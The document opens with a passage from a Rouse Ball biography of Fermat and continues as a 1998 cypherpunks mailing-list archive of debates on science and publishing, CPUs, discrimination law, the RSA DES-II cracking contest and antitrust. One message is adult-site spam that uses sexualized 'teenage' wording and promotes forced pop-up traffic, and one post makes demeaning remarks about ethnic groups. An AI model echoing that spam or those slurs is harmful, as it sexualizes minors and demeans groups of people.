   The sum of these is p^(1/3) a^(5/3) e / ( 1 - (1 - e)^(5/3) ) ; and by
   a subsidiary proposition (for he was not acquainted with the binomial
   theorem) he finds the limit of this, when e vanishes, to be (3/5)
   p^(1/3) a^(5/3) . The theorems last mentioned were published only
   after his death; and probably they were not written till after he had
   read the works of Cavalieri and Wallis.
   
   Kepler had remarked that the values of a function immediately adjacent
   to and on either side of a maximum (or minimum) value must be equal.
   Fermat applied this principle to a few examples. Thus, to find the
   maximum value of x(a - x), his method is essentially equivalent to
   taking a consecutive value of x, namely x - e where e is very small,
   and putting x(a - x) = (x - e)(a - x + e). Simplifying, and ultimately
   putting e = 0, we get x = 1/2. This value of x makes the given
   expression a maximum.
   
   (iii) Fermat must share with Pascal the honour of having founded the
   theory of probabilities. I have already mentioned the problem proposed
   to Pascal, and which he communicated to Fermat, and have there given
   Pascal's solution. Fermat's solution depends on the theory of
   combinations, and will be sufficiently illustrated by the following
   example, the substance of which is taken from a letter dated August
   24, 1654, which occurs in the correspondence with Pascal. Fermat
   discusses the case of two players, A and B, where A wants two points
   to win and B three points. Then the game will be certainly decided in
   the course of four trials. Take the letters a and b, and write down
   all the combinations that can be formed of four letters. These
   combinations are 16 in number, namely, aaaa, aaab, aaba, aabb; abaa,
   abab, abba, abbb; baaa, baab, baba, babb; bbaa, bbab, bbba, bbbb. Now
   every combination in which a occurs twice or oftener represents a case
   favourable to A, and every combination in which b occurs three times
   or oftener represents a case favourable to B. Thus, on counting them,
   it will be found that there are 11 cases favourable to A, and 5 cases
   favourable to B; and since these cases are all equally likely, A's
   chance of winning the game is to B's chance as 11 is to 5.
   
   The only other problem on this subject which, as far as I know,
   attracted the attention of Fermat was also proposed to him by Pascal,
   and was as follows. A person undertakes to throw a six with a die in
   eight throws; supposing him to have made three throws without success,
   what portion of the stake should he be allowed to take on condition of
   giving up his fourth throw? Fermat's reasoning is as follows. The
   chance of success is 1/6, so that he should be allowed to take 1/6 of
   the stake on condition of giving up his throw. But if we wish to
   estimate the value of the fourth throw before any throw is made, then
   the first throw is worth 1/6 of the stake; the second is worth 1/6 of
   what remains, that is 5/36 of the stake; the third throw is worth 1/6
   of what now remains, that is, 25/216 of the stake; the fourth throw is
   worth 1/6 of what now remains, that is, 125/1296 of the stake.
   
   Fermat does not seem to have carried the matter much further, but his
   correspondence with Pascal shows that his views on the fundamental
   principles of the subject were accurate: those of Pascal were not
   altogether correct.
   
   Fermat's reputation is quite unique in the history of science. The
   problems on numbers which he had proposed long defied all efforts to
   solve them, and many of them yielded only to the skill of Euler. One
   still remains unsolved. This extraordinary achievement has
   overshadowed his other work, but in fact it is all of the highest
   order of excellence, and we can only regret that he thought fit to
   write so little.
     _________________________________________________________________
   
   
   
   This page is included in a collection of mathematical biographies
   taken from A Short Account of the History of Mathematics by W. W.
   Rouse Ball (4th Edition, 1908).
   
   Transcribed by
   
   
    D.R. Wilkins
    (dwilkins@maths.tcd.ie)
    School of Mathematics
    Trinity College, Dublin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Raymond D. Mereniuk" <Raymond@fbn.bc.ca>
Date: Sun, 11 Jan 1998 12:04:28 +0800
To: cypherpunks@Algebra.COM
Subject: Re: In God We Antitrust, from the Netly News
In-Reply-To: <v03102800b0dc2d3e93db@[207.167.93.63]>
Message-ID: <199801110453.UAA07556@leroy.fbn.bc.ca>
MIME-Version: 1.0
Content-Type: text/plain




> Tim May <tcmay@got.net> writes:
> > The AMD K6 may not be quite the dog the K5 was, 
> 
> I've got a K5, seems like a fine CPU to me... around the performance
> of a P166 for about 1/2 the price.

>From a purist point of view the Intel Pentium processors are good 
performance pieces.  The main problem with the Cyrix/IBM is very poor 
math coprocessor performance.  The average user may never notice the 
difference but the tests and real life use of Quake show that the 
Cyrix/IBM is not of the same standard as the Pentium.

I have a Intel 166MMX labelled processor running just fine at 225 Mhz 
(75 Mhz X 3).  You can't do the same thing with Cyrix/IBM processors, 
maybe you can over-clock them one step.  I am a keen fan of 
competition in the marketplace and I have two Cyrix/IBM processors in 
the systems in my home.  I have not tried the AMD Pentium class 
processors but I intend to buy one in the near future just to play 
around with it.  In the past AMD was the king of over-clocking and 
did things with the 486 chip that Intel could not, or chose not to.  
I hope AMD again gains that distinction with their Pentium class 
processors.  

Maybe Tim May has the real inside scoop on the AMD K6 processors.  
Certain segments of the market are commiting resources to the AMD K6 
and you should see as many in the market as AMD can produce.  Tim 
May's comments on yield problems at AMD could be very true as 
resellers are having a problem acquiring  AMD K6s processors.  

> 
> Why do you say the K5 is a dog?
> 
> K6 is similarly value for money.
> 
> I also bought a AMD 486 120Mhz a while ago for similar value for money
> reasons.
> 
> I thought for a while Cyrix or AMD had faster processors available
> than Intel.  (Just prior to to Pentium II, where the Pentium Pro was
> highly priced and for some applications slower than an Pentium clocked
> at the same speed).
> 
> I may not be off to buy AMD stock, but I like competition, and will
> buy AMD or Cyrix any time they have a cheaper and compatible product.
> 
> Adam
> -- 
> Now officially an EAR violation...
> Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/
> 
> print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
> )]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`
> 
> 
Virtually

Raymond D. Mereniuk
Raymond@fbn.bc.ca





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc <blancw@cnw.com>
Date: Sun, 11 Jan 1998 12:06:34 +0800
To: cypherpunks@cyberpass.net
Subject: Re: rant on the morality of confidentiality
Message-ID: <3.0.32.19980110200421.007049d8@cnw.com>
MIME-Version: 1.0
Content-Type: text/plain



Vladerusky:

Your original post brought up several separate aspects which can be
considered separately and may not necessarily coexist in the same place at
the same time:

1)  secrecy
2)  responsibility for publishing
3)  working for the government at the expense of unwilling payors
4)  the motivations of "true scientists"
5)  the requirements for the advancement of science
6)  the need of science for the works of great minds

Initially your argument had to do with secrecy and the need for scientists
to publish their work so that the scientific community may benefit from it.
  I can't disagree that if a scientist is working for the public, that they
should make their work publically available to them, since, after all, they
are supposedly working for the public benefit.

But you also said that "a key aspect of SCIENCE is publishing".    I was
only pointing out that, in the context of those who are working for their
own purposes and not under the employment of a government agency, some
scientists are not overly concerned about contributing to this advancement,
as can be observed by their reluctance to publish (even if they eventually
do, "under the extreme pressure of friends", for instance).

It may be your conclusion that the advancement of science depends upon
scientists publishing their works, but the fact is that some great
scientists, and many others as well, are not as motivated to contribute as
you think is proper for a "true scientist".

I think you should distinguish between those scientistis who have joined
some kind of "scientific community" and have established an obligation to
share the results of their work with that group, and those scientists who
are what they are, and do what they do, from motivations unrelated to such
communities.
    ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sun, 11 Jan 1998 12:56:28 +0800
To: cypherpunks@toad.com
Subject: Re: Freedom Forum report on the State of the First Amendment
In-Reply-To: <Ty89He4w165w@bwalk.dm.com>
Message-ID: <3.0.5.32.19980110202657.009336a0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




>>> Umm, no, freedom doesn't work like that.  If you open a *private*
>>> establishment, you have the right, according to the constitution, to 
>>> deny *anyone* the right to enter or eat in your restraunt.

I don't see freedom of association listed anywhere there;
you might construe it as a "taking" or something, but it'd be a stretch.
Also, there was a really appalling court case in the 1890s
(Plessey vs. Ferguson), in which the Supremes ruled that states
could require segregation with separate but equal accommodations;
it was somewhat overturned by Brown vs. Board of Education in 1954,
but the idea that the government can tell you how to run your business
is long established (after all, we'd need much smaller governments
if they couldn't be interfering in business.)

>>Tell that to Denney's restaurants. (No, not in the United Fascist
>>States of Amerika you can't.)

>Apologies.  In *theory* you have those rights, on *paper*, you have those
>rights, but in *practice*, you're correct, the Government has power that
>it gleefully abuses, forcing others to comply w/ political correctness.
>
>I'd like some more info on this Denny's thing.

A Denny's restaurant in Maryland had two groups of customers
show up one day, one group black, one group white, both about 6-8 people,
both arriving at the same time, both groups out-of-uniform cops.
The white people got served promptly, the blacks got served
extremely late and rudely.  And sued, and won.

(I was mainly surprised that the white cops got served fast;
my experience in Denny's has almost always been slow bad service,
except for one restaurant in Pennsylvania that hasn't learned
how to act like a real Denny's :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 11 Jan 1998 10:05:34 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: rant on the morality of confidentiality (fwd)
Message-ID: <199801110229.UAA15382@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 10 Jan 1998 16:51:05 -0800
> From: Tim May <tcmay@got.net>
> Subject: Re: rant on the morality of confidentiality

> Doesn't matter how the establishment (whatever that might be) looked on him
> or not...you challenged me to name _one_ example, and I named several. Oh,
> and it is not true as you later claim that all of my examples "eventually
> published" all of their findings. Fermat did not, Gauss did not.

Gauss and Fermat both published or shared their works with others
contemporaries as demonstrated via their short biographies that I submitted
to the list.

> My main point has been to refute your notion that any one who elects not to
> publish in the open literature cannot be a scientist. I know of many
> scientists who could not publish, or chose not to for various reasons.

If one doesn't publish (which in the scientific sense means to share
publicly ones discoveries, *not* necessarily in open literature - which is a
constraint you have never implied before now - changing the rules in the
middle of the game are we...and while you go ballistic - when Gauss and
Fermat were alive there were no magazines, work was published via
demonstrations, books or by letters shared between co-workers) then be so
kind as to explain how anyone would find out about the work in the first
place, divine intervention?

> I mentioned the Manhattan Project scientists. (Choate made some bizarre
> claim after this mention that all of the science was known in the 20 and
> 30s, and that no actual science was done by MP "engineers" and
> "technicians." Might be a surprise to Ulam, Teller, von Neumann, and all
> the others who worked in secrecy on the atom bomb, then the hydrogen bomb,
> and so on.)

What Ulam, Teller, Von Neumann did regarding actualy making the devices;
such as the work on explosive lenses; was *engineering or technology* it
wasn't science. Science as was extant at the time was quite capable of
describing what needed to be done, the question was how to build the damn
thing. THAT question is technological not scientific. Furher, at *no* time
did I imply that those working on the bomb simply quite working on the
theoretical issues that were still unanswered. The reality is, as my
original claim, that the process *required both*. However, taking this to
the extreme, as you are want to do, of equating them is a disservice to
their achievements and the endeavors of science and engineering.

Further, if you had done one whit of research on the Manhatten Project you
would have found that the *primary* issue for most of the scientist was that
the military wouldn't allow them to *share their work*. In many of the
letters, depositions, minutes of meetings, etc. there are continous and
heated discussion on how the secrecy impacted negatively the process of
meeting their goals. Ulam, Teller, Von Neumann, et ali. would be the *first*
to refute your claim.

> Oh, and what of all the many fine Russian scientists of this century,
> nearly all restricted in what they could publish? Because they could not
> submit their work to open publication were they not doing science?

And very little of what they didn't publish outside of the CCCP made a big
difference to what others were doing. As a matter of fact, because of this
many of the Russian scientists are reaping the rewards by being passed over
for Nobels and other such rewards for sharing their work. A very clear
result of this policy in the CCCP was the technological 2nd class that
resulted in just about every aspect of Soviet science and engineering
outside of some very esoteric and theoretical work. A primary example of
*why* and *how* such secrecy *inhibits* rather than promotes science is a
study of Russian biological sciences. If you seriously claim that the policy
of state secrecy didn't inhibit russian science then be so kind as to
explain their clones of the Apple II or the IBM 360, which were truly
attrocious in their technology. Just look at the impact on China because of
these sorts of policies, it was in the late 1970's before they ever managed
to build a TTL equivalent quad-NAND gate, something that the western world
had been cranking out since the late 1960's. I got involved in computers and
electronics in 1969 *because* those self same 7400 chips were *dumped on the
surplus market*. Prey tell how we managed to create a technological millieu
that allows 9 year old kids to play with chips for pennies when a whole damn
country with a population in the billions can't manage to build and use till
nearly 10 years later? 

> The point being that open publication is only a part of the methodology of
> doing science, and a fairly recent one, too.

Malarky. If you simply review the history of science (something that is
becoming clear you haven't) and study some of these great luminaries works
you find that *critical* to all of them was *sharing* their work(s) with
others of a similar bent. Their biographies are replete with mentions of
letters, meetings, books, etc. they both supplied and received from others.

Back to Newton, he graduated in 1665 w/ a BA from Cambridge. Shortly before
this he had begun his experiments in light. He published these results in
'Philosophical Transactions' in 1672 and was elected a fellow of the Royal
Society the same year because of it. In 1687, at Halleys prompting to
abandon his chemical studies (he was an alchemist) and focus on mechanics,
he published 'Principia'. This same year is when he became involved in
politics which eventualy resulted in his appointment in 1689 to the
Convention Parliament of the university. In 1695 he was appointed the Warden
of the Mint. In 1727 he was appointed Master of the Mint, which he held
until his death. In 1703 he became the president of the Royal Society.
That same year he published 'Opticks'. In 1705 he was knighted. He also
wrote religous works, two of the best known were 'Observations of the
Prophecies of Daniel' and 'Church History'.

How in good faith you can claim this doesn't qualify as sharing their work
and that such sharing isn't critical to advancement is truly revealing.



    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 11 Jan 1998 10:27:46 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: More on Fermat...
Message-ID: <199801110252.UAA15458@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Given Tim May's assertion that publishing is not critical to the advancement
of science *and* that Fermat is a prime example of this I would like to
examine it.

Let's ignore the references to Fermat's letters and such to Pascal,
Descarte, and others. Let's take as a given that Fermat's work was not
published. When he died the executors found the material and decided to
publish it (we'll ignore their motives for a moment). The result was a
global 'aha' for mathematicians. A collective "Ah, so THAT's how you do
that."

Since it is clear that had Fermat's work *not* been published those self
same problems would have remained unsolved, perhaps some as long as his Last
Theorem which stands as a prime example of the result of *not* publishing or
noting results, perhaps some even till today. It is clear that the initial
hypothesis that publishing (or sharing) of work is not critical is clearly
incorrect by the very example it holds to prove itself.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ryan@ntslink.net
Date: Sun, 11 Jan 1998 13:50:49 +0800
To: <cypherpunks@toad.com>
Subject: RML : New Webmaster Newsletter!!
Message-ID: <199801110544.VAA21137@usa-1.gsd.com.au>
MIME-Version: 1.0
Content-Type: text/plain




This List has been purchased by "RML" This is the first webmaster mailing we have done so
if you are not a Adult Webmaster, wish to be removed from this list, or have more than one
E-mail from us please let us know and we will take care of it! Webmasters contact us at
ryan@ntslink.net for the price to mail out this newsletter with your Company's information!
---------------------------------------------------------------------------------------------------------------------------------

Ranked # 32 on Web Side Story Tight Teenage Nymphos new *Cheater Proof* Top 50 is
kicking some serious ass ;-) The site is at http://www.teennympho.com and the webmaster's
area is at http://www.teennympho.com/webmasters.html

* We were one of the first 10 Top 50's on the net to have the automatically updated script * 

* We have double CGI to prevent cheaters from getting listed * 

* You can send hits to our site by opening a console wth our link in it ANY way you want !!
Some ideas are 1)Opening it every time someone leaves/enters your site 2) Opening it every
time someone clicks on a link to one of your pics 3) Any other way you can think of! *

* We average 30-40,000 Uniques a day by Webside Story's Count *

* NO Main page BANNERS * 

* TONS OF BOOKMARK HITS *

Click here http://www.teennympho.com to find out more information ;-)

We'll see you at the TOP!!!!

               Sincerely,
                               Ryan Lanane





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 11 Jan 1998 13:00:32 +0800
To: cypherpunks@toad.com
Subject: Re: Freedom, Starvation, and Uncoerced Relationships
In-Reply-To: <v03102800b0dd76ca993a@[207.167.93.63]>
Message-ID: <Hui5ie51w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got.net> writes:

> >> Why there is even discussion on this point on a list whose membership is
> >> composed mainly of market anarchists is beyond me,
> >
> >Since when has a crypto anarchist been a market anarchist?
>
> And how else could it be?

Evidently some folks on this list do feel that it's possible for the gubmint
to curtail our liberties in some ways and not in others.  Phooey.

> (And most employers will value work output--profits--over lesser
> considerations. So, even though a boss has every "right" to demand that
> employees where dunce caps to work, for example, few will. Those who do
> will lose their employees and go out of business. Sounds fair to me.)

Likewise an employer that discriminates, e.g., redheads of lefties will
lose to its competitors who will hire the valuable employees that this
moron rejected.

> >So allowing someone to stave to death because thay have the wrong collour
> >of skin, or unwilling to get up close and personal with the boss, is not a
> >form of harm.
>
> I "allow people to starve to death" each and every day because they are not
> doing something I want. Think about it. Every time I elect not to send
> money to starving Bengalis or Hutus or Ugabugus I am "allowing them to
> starve," quite literally.
>
> So?

So the United Nations of some other body will take your wealth and
redistribute it to the starving Bengalis whose religion tells them
to have 19 children.

> If an employer chooses not to hire certain types of persons this is really
> no different from my choosing not to marry certain types of persons (and I
> can imagine I could save a woman from "starving" by simply flying to Bangla
> Desh, finding a starving woman, marrying her, and then supporting her. So?).

Should women be allowed to allow men to go horny by refusing to have sex
with certain classes of people?  Can a white woman be sued for consistently
refusing to sleep with black men?

> Freedom means freedom. That some people will not have as much food as they
> would like to have in a free society is no reason to discard freedom.
>
> More to the point, crypto anarchy means taking such decisions about whether
> to discard freedom or not out of the hands of others.

On the internet nobody knows that you're a protected minority.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Trei Family <trei@relay-1.ziplink.net>
Date: Sun, 11 Jan 1998 12:10:53 +0800
To: coderpunks@toad.com
Subject: DES 2 challenge: Are you going to help?
Message-ID: <3.0.1.32.19980110230904.007ec230@pop3.ziplink.net>
MIME-Version: 1.0
Content-Type: text/plain



There's been remarkably little discussion about the DES II contest 
sponsored by RSA labs.

On the 13th, RSA will post another DES challenge, again with a $10,000
prize. There's a new wrinkle: while the prize is still being given to
the first person who reports the key, the size of the prize dwindles as
time goes by. It's $10k for the first 540 hours (about 3 weeks), then drops 
to $5k for the next 540, then $1000, and after 1620 hours drops to 0.

Next June RSA will release another challenge, with the same prize; however
the time limits will ratchet down depending on how fast the key is discovered
this time around. Details are at www.rsa.com

I've heard of only one organized group which plans to attack it; the one
based at www.distributed.net This is the same group which successfully 
brute forced 56 bit RC5 encryption. My educated guess, based on the speed 
with which they are currently searching RC5-64 (about 11 Gkey/sec) and the 
known speed differences between RC5 and DES searching, is that they have 
a good but not certain chance of finding the key within the $10,000 window.
[Interesting factoid - at that speed they could crack 40 bit RC5 keys at
better than one a minute.]

If you have cycles to spare, you might consider joining for the DES attack.
Their clients are quite good, and do not interfere with normal operations.

If you don't want to trust d.n's organizers, consider running Svend
Mikkelsen's
Bryddes for x86 processors. It's quite a bit faster than my DESKR, and full
source
is available.

Peter Trei
trei@ziplink.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sun, 11 Jan 1998 16:05:28 +0800
To: Tim May <cypherpunks@cyberpass.net
Subject: Re: Theory Behind USA v. Microsoft
In-Reply-To: <1.5.4.32.19980110191251.0101e398@pop.pipeline.com>
Message-ID: <3.0.5.32.19980110231328.00850e60@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>>John Cassidy writes in the January 12 New Yorker mag
>>of the controversial economic theory which undergirds DoJ's
>>antitrust action against Microsoft.
>>He cites a seminal 1984 paper by Brian Arthur, "Competing
>>Technologies and Lock-in by Historical Small Events: The
>>Dynamics of Choice Under Increasing Returns."
...
>>After years of disparagement the theory seems to have
>>caught on, at least at Justice and with others who oppose the
>>theory of free market determination of winners and losers.
>>Arthur argues that market dominance by inferior products
>>is possible, and cites MS-DOS as an example.

Two other examples - 
- Rockefeller's takeover of the oil industry in the late 1800s
- the Anti-Trust laws that were intended to stop Rockefeller :-)

Apparently a large part of Rockefeller's success was recognizing the
critical resource in the industry and using control of it for
economic advantage.  The resource was railroad oil tank cars,
which were immensely more economical for shipping oil than the
competing technologies - transportation costs were substantial.
Rockefeller cornered the market for them, using them to ship oil
cheaper than other shippers, allowing his refineries to outbid
competitors for crude oil from suppliers, cornering enough of that
market to have a dominant position with the railroads,
which didn't have an economic motivation to buy their own tank cars,
and the tank car makers didn't have an incentive to make them on spec,
especially with Rockefeller twisting their arms.

The total amount of actual capital was pretty small - about 
5000-6000 cars at $1000 each, back when that was still real money,
but it was enough to leverage the industry.  There were other factors
involved - his control over the tank cars let him get away with
ripping off his oil suppliers and the railroads on measurements of
the quantities they were shipping, much corporate shuffling
to hide the real ownership of the resources and evade regulators,
kickbacks to avoid common carrier railroad tariffs,
and heavy use of information technology (5000 cars only needed a
couple of clerks with ledgers, but there were lots of people 
telegraphing shipping data back to them so it was near-real-time.)

If the industry had been well-understood, rather than breaking up
a billion-dollar business, the anti-trust folks could have subsidized 
(directly or through tax breaks) competing production of tank cars.
They did try to control ownership of tank cars, so Rockefeller spun off
the tank car company, but retained effective control for decades.
Their choices have set us up for a century of bad law....

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sun, 11 Jan 1998 16:08:11 +0800
To: cypherpunks@toad.com
Subject: Re: Anger Crimes Up 442% In Bay Area
In-Reply-To: <34927314.21AC@dev.null>
Message-ID: <3.0.5.32.19980110231626.0084f7b0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 03:35 AM 12/13/97 -0800, Bezerkeley Nutly News [Toto again] wrote:
>[Bezerkeley Nutly News: Special Report by Defcon McCullagh Chainsaw]
>AT AN EMERGENCY CYPHERPUNKS PHYSICAL MEETING AT THE W&S TAVERN AT 
>5 a.m. in south Berkeley this morning, a lone gunman held police at
>bay for several hours before escaping with a carton of cigarettes and
>several bottles of cheap scotch.

Nonsense.  None of us drink _cheap_ Scotch.....  




				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 11 Jan 1998 12:55:58 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: rant on the morality of confidentiality (fwd)
Message-ID: <199801110521.XAA16005@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 10 Jan 1998 20:05:20 -0800
> From: Blanc <blancw@cnw.com>
> Subject: Re: rant on the morality of confidentiality 

> Your original post brought up several separate aspects which can be
> considered separately and may not necessarily coexist in the same place at
> the same time:

I'm not shure who the 'Your' is but I'd like to add some comments on these
issues and observations.

> 1)  secrecy

If you don't know something you either can't take advantage of it or else
you have to rediscover it on your own. It is clear that if everyone had to
re-invent the wheel at every step then not much would get done.

> 2)  responsibility for publishing

Nobody has a responsbility to publish. Science is a completely voluntary
pursuit. I would contend personaly that if you don't publish you arent'
doing science but rather mental masturbation (a rather selfish pursuit I
suspect).

> 3)  working for the government at the expense of unwilling payors

I don't think this is relevant to the issue at all.

> 4)  the motivations of "true scientists"

Who spoke of true scientist? A 3 year old kid poking at a lightening bug on
a warm summer eve is as much a true scientist as a Nobel prize winner working
on cosmology, the reason is that *both* will share it with anyone they can
get to hold still long enough to listen. We have been speaking of the impact
of sharing data on the expansion of scienctific knowledge. The actual logic
is remakably simple. If you don't let others know of your work then others
must recreate it or it gets lost and the consequences of that is that whole
areas of knowledge go unvisited potentialy forever. When *they* share it
*they* get credit for it not you (which may or may not be a motive of the
individual, it certainly has *nothing* to do with actualy doing science
however; it's sorta like why some boy asked you out when you were a kid, they
either wanted in your pants or had a genuine interest in your company, or
perpaps even both. In any case this has nothing to do with the fact that a
date is occurring, it's the mechanism and not the motive that is important).

> 5)  the requirements for the advancement of science

To share ones knowledge with others in such a manner that they may
indipendantly verify the results to demonstrate some general pattern in the
mechanism(s) of the cosmos. Once this is done the next step is to
explore the consequences of this new set of general patterns and what the
new understanding leads to.

> 6)  the need of science for the works of great minds

I don't think science needs great minds as much as it offers a set of
opportunities to apply those talents in a challenging manner that is not
present in many other human pursuits. The relationship is like a moth to a
flame (hopefuly with less drastic consequences than for the moth).

> Initially your argument had to do with secrecy and the need for scientists
> to publish their work so that the scientific community may benefit from it.
>   I can't disagree that if a scientist is working for the public, that they
> should make their work publically available to them, since, after all, they
> are supposedly working for the public benefit.

To jump from sharing your work with others in the scientific community and
equating that community to the public is a bit of a leap. The vast majority
of folks wouldn't have a clue what to do with any particular piece of work,
let alone how to use it to get something else that wasn't known. Most
scientist can't fully apply results from other fields unless they happen to
be a polymath or possess some special insight or ability (such as a savante,
a good example is Gauss' being able to instantly see how to sum the first
100 numbers by pairings). To do science requires a discipline that even many
of those who are trying to do science aren't successful at aquiring.

> But you also said that "a key aspect of SCIENCE is publishing".    I was
> only pointing out that, in the context of those who are working for their
> own purposes and not under the employment of a government agency, some
> scientists are not overly concerned about contributing to this advancement,
> as can be observed by their reluctance to publish (even if they eventually
> do, "under the extreme pressure of friends", for instance).

Then perhaps they aren't doing science. One also has to look at the
motivation of why they aren't publishing. It could be that they don't trust
their results, feel that nobody will understand them because of the esoteric
nature, simple bashfulness gone extreme, or open hostility or asocial
tendencies. This last issue raises a whole range of questions and
conclusions about 'great minds' and their 'quirkiness' and commen bahaviour.

> It may be your conclusion that the advancement of science depends upon
> scientists publishing their works, but the fact is that some great
> scientists, and many others as well, are not as motivated to contribute as
> you think is proper for a "true scientist".

It isn't a question of what I think or some definition of 'true scientist'.
It *is* a consequence of what is required to do science which requires that
the work you do is shared with others so *they* don't have to recreate it
and therefore waste time and effort. Science, by definition, is a
collaborative effort. Consider the Fermat example from Tim May, had Fermat
went ahead and written his proof down *and* it had been found all those
people over the last 200 years would have been able to work on other
problems. What kinds of changes in our technology and as a consequence our
society would have resulted if *that* could have happened. Instead of 2 steps
forward and 1 step back we might be 3 steps forward...

> I think you should distinguish between those scientistis who have joined
> some kind of "scientific community" and have established an obligation to
> share the results of their work with that group, and those scientists who
> are what they are, and do what they do, from motivations unrelated to such
> communities.

I think you should be more consistent in your definition in what science is,
what it requires from its practitioners, and how that distinguishes them
from others. Simply because I slop paint on a canvas doesn't make me a
artist though it does make me a painter. And it is clear that, at least for
this example, the artist *is* a painter. 'A implying B' does *not* imply
'B implying A'.



    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 11 Jan 1998 12:58:10 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: This message required an admin ok...so I gave it
Message-ID: <199801110523.XAA16080@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Not shure why this thing bounced but I'm going ahead and forwarding it to
the list just in case it didn't percolate through on its own...


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|



Forwarded message:
> From owner-cypherpunks@ssz.com Sat Jan 10 23:11:11 1998
> Date: Sat, 10 Jan 1998 23:11:10 -0600
> Message-Id: <199801110511.XAA15988@einstein.ssz.com>
> To: owner-cypherpunks@ssz.com
> From: owner-cypherpunks@ssz.com
> Subject: BOUNCE cypherpunks@ssz.com: Admin request
> 
> >From cypherpunks-owner@ssz.com  Sat Jan 10 23:11:07 1998
> Received: (from cpunks@localhost) by einstein.ssz.com (8.6.12/8.6.9) id XAA15979 for cypherpunks@ssz.com; Sat, 10 Jan 1998 23:11:05 -0600
> Received: from www.video-collage.com (www.video-collage.com [206.15.171.132]) by einstein.ssz.com (8.6.12/8.6.9) with ESMTP id XAA15969 for <cpunks@ssz.com>; Sat, 10 Jan 1998 23:11:00 -0600
> Received: (from cpunks@localhost)
> 	by www.video-collage.com (8.8.5/8.8.5) id XAA11517;
